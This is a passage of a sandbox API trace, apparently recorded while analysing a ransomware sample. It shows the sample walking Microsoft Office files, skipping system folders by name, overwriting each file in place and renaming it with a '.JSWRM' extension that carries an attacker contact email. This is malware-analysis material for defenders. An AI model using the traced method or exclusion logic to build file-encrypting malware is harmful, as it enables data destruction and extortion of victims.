lpWideCharStr="PGLBL118.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL118.XML", lpUsedDefaultChar=0x0) returned 12 [0139.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.099] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL118.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl118.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.099] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=161338) returned 1 [0139.099] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.099] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0139.111] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.111] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0139.111] CloseHandle (hObject=0x238) returned 1 [0139.111] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL118.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl118.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL118.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl118.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.112] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d5c7ff6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d5c7ff6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d5c7ff6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa002, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL119.XML", cAlternateFileName="")) returned 1 [0139.113] lstrcmpiW (lpString1="PGLBL119.XML", lpString2=".") returned 1 [0139.113] lstrcmpiW (lpString1="PGLBL119.XML", lpString2="..") returned 1 [0139.113] lstrcmpiW (lpString1="PGLBL119.XML", lpString2="...") returned 1 [0139.113] lstrcmpiW (lpString1="PGLBL119.XML", lpString2="windows") returned -1 [0139.113] lstrcmpiW (lpString1="PGLBL119.XML", lpString2="recovery") returned -1 [0139.113] lstrcmpiW (lpString1="PGLBL119.XML", lpString2="perflogs") returned 1 [0139.113] lstrcmpiW (lpString1="PGLBL119.XML", lpString2="documents and settings") returned 1 [0139.113] lstrcmpiW (lpString1="PGLBL119.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.113] lstrcmpiW (lpString1="PGLBL119.XML", lpString2="system volume information") returned -1 [0139.113] lstrcmpiW (lpString1="PGLBL119.XML", lpString2="msocache") returned 1 [0139.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL119.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL119.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL119.XML", lpUsedDefaultChar=0x0) returned 12 [0139.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL119.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL119.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL119.XML", lpUsedDefaultChar=0x0) returned 12 [0139.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL119.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl119.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.114] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=40962) returned 1 [0139.114] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.114] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xa000, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xa000, lpOverlapped=0x0) returned 1 [0139.119] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.119] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xa000, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xa000, lpOverlapped=0x0) returned 1 [0139.120] CloseHandle (hObject=0x238) returned 1 [0139.120] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL119.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl119.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL119.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl119.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.121] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d5c7ff6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d5c7ff6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d5c7ff6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8d14, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL120.XML", cAlternateFileName="")) returned 1 [0139.121] lstrcmpiW (lpString1="PGLBL120.XML", lpString2=".") returned 1 [0139.121] lstrcmpiW (lpString1="PGLBL120.XML", lpString2="..") returned 1 [0139.121] lstrcmpiW (lpString1="PGLBL120.XML", lpString2="...") returned 1 [0139.121] lstrcmpiW (lpString1="PGLBL120.XML", lpString2="windows") returned -1 [0139.121] lstrcmpiW (lpString1="PGLBL120.XML", lpString2="recovery") returned -1 [0139.121] lstrcmpiW (lpString1="PGLBL120.XML", lpString2="perflogs") returned 1 [0139.121] lstrcmpiW (lpString1="PGLBL120.XML", lpString2="documents and settings") returned 1 [0139.121] lstrcmpiW (lpString1="PGLBL120.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.121] lstrcmpiW (lpString1="PGLBL120.XML", lpString2="system volume information") returned -1 [0139.121] lstrcmpiW (lpString1="PGLBL120.XML", lpString2="msocache") returned 1 [0139.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL120.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL120.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL120.XML", lpUsedDefaultChar=0x0) returned 12 [0139.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL120.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL120.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL120.XML", lpUsedDefaultChar=0x0) returned 12 [0139.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL120.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl120.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.122] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=36116) returned 1 [0139.122] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.122] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x8d10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x8d10, lpOverlapped=0x0) returned 1 [0139.126] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.126] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x8d10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x8d10, lpOverlapped=0x0) returned 1 [0139.126] CloseHandle (hObject=0x238) returned 1 [0139.126] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL120.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl120.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL120.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl120.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.127] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc348b22, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc348b22, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc68ff65, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2247e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN001.XML", cAlternateFileName="")) returned 1 [0139.127] lstrcmpiW (lpString1="PGMN001.XML", lpString2=".") returned 1 [0139.127] lstrcmpiW (lpString1="PGMN001.XML", lpString2="..") returned 1 [0139.127] lstrcmpiW (lpString1="PGMN001.XML", lpString2="...") returned 1 [0139.127] lstrcmpiW (lpString1="PGMN001.XML", lpString2="windows") returned -1 [0139.127] lstrcmpiW (lpString1="PGMN001.XML", lpString2="recovery") returned -1 [0139.127] lstrcmpiW (lpString1="PGMN001.XML", lpString2="perflogs") returned 1 [0139.127] lstrcmpiW (lpString1="PGMN001.XML", lpString2="documents and settings") returned 1 [0139.128] lstrcmpiW (lpString1="PGMN001.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.128] lstrcmpiW (lpString1="PGMN001.XML", lpString2="system volume information") returned -1 [0139.128] lstrcmpiW (lpString1="PGMN001.XML", lpString2="msocache") returned 1 [0139.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN001.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN001.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN001.XML", lpUsedDefaultChar=0x0) returned 11 [0139.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN001.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN001.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN001.XML", lpUsedDefaultChar=0x0) returned 11 [0139.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN001.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn001.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.129] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=140414) returned 1 [0139.129] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.129] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x22470, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x22470, lpOverlapped=0x0) returned 1 [0139.138] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.138] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x22470, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x22470, lpOverlapped=0x0) returned 1 [0139.139] CloseHandle (hObject=0x238) returned 1 [0139.139] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN001.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn001.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN001.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn001.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.140] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d5a1d84, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d5a1d84, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d5c7ff6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xeb68, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN002.XML", cAlternateFileName="")) returned 1 [0139.140] lstrcmpiW (lpString1="PGMN002.XML", lpString2=".") returned 1 [0139.140] lstrcmpiW (lpString1="PGMN002.XML", lpString2="..") returned 1 [0139.140] lstrcmpiW (lpString1="PGMN002.XML", lpString2="...") returned 1 [0139.140] lstrcmpiW (lpString1="PGMN002.XML", lpString2="windows") returned -1 [0139.140] lstrcmpiW (lpString1="PGMN002.XML", lpString2="recovery") returned -1 [0139.140] lstrcmpiW (lpString1="PGMN002.XML", lpString2="perflogs") returned 1 [0139.140] lstrcmpiW (lpString1="PGMN002.XML", lpString2="documents and settings") returned 1 [0139.140] lstrcmpiW (lpString1="PGMN002.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.140] lstrcmpiW (lpString1="PGMN002.XML", lpString2="system volume information") returned -1 [0139.140] lstrcmpiW (lpString1="PGMN002.XML", lpString2="msocache") returned 1 [0139.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN002.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN002.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN002.XML", lpUsedDefaultChar=0x0) returned 11 [0139.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN002.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN002.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN002.XML", lpUsedDefaultChar=0x0) returned 11 [0139.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.140] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN002.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn002.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.142] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=60264) returned 1 [0139.142] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.142] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xeb60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xeb60, lpOverlapped=0x0) returned 1 [0139.147] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.147] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xeb60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xeb60, lpOverlapped=0x0) returned 1 [0139.147] CloseHandle (hObject=0x238) returned 1 [0139.147] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN002.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn002.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN002.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn002.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.148] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d5a1d84, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d5a1d84, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d5c7ff6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1bc4, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN010.XML", cAlternateFileName="")) returned 1 [0139.148] lstrcmpiW (lpString1="PGMN010.XML", lpString2=".") returned 1 [0139.148] lstrcmpiW (lpString1="PGMN010.XML", lpString2="..") returned 1 [0139.148] lstrcmpiW (lpString1="PGMN010.XML", lpString2="...") returned 1 [0139.148] lstrcmpiW (lpString1="PGMN010.XML", lpString2="windows") returned -1 [0139.148] lstrcmpiW (lpString1="PGMN010.XML", lpString2="recovery") returned -1 [0139.148] lstrcmpiW (lpString1="PGMN010.XML", lpString2="perflogs") returned 1 [0139.149] lstrcmpiW (lpString1="PGMN010.XML", lpString2="documents and settings") returned 1 [0139.149] lstrcmpiW (lpString1="PGMN010.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.149] lstrcmpiW (lpString1="PGMN010.XML", lpString2="system volume information") returned -1 [0139.149] lstrcmpiW (lpString1="PGMN010.XML", lpString2="msocache") returned 1 [0139.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN010.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN010.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN010.XML", lpUsedDefaultChar=0x0) returned 11 [0139.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN010.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN010.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN010.XML", lpUsedDefaultChar=0x0) returned 11 [0139.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.149] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN010.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn010.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.150] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7108) returned 1 [0139.150] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.150] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1bc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1bc0, lpOverlapped=0x0) returned 1 [0139.152] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.152] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1bc0, lpNumberOfBytesWritten=0x345e898, 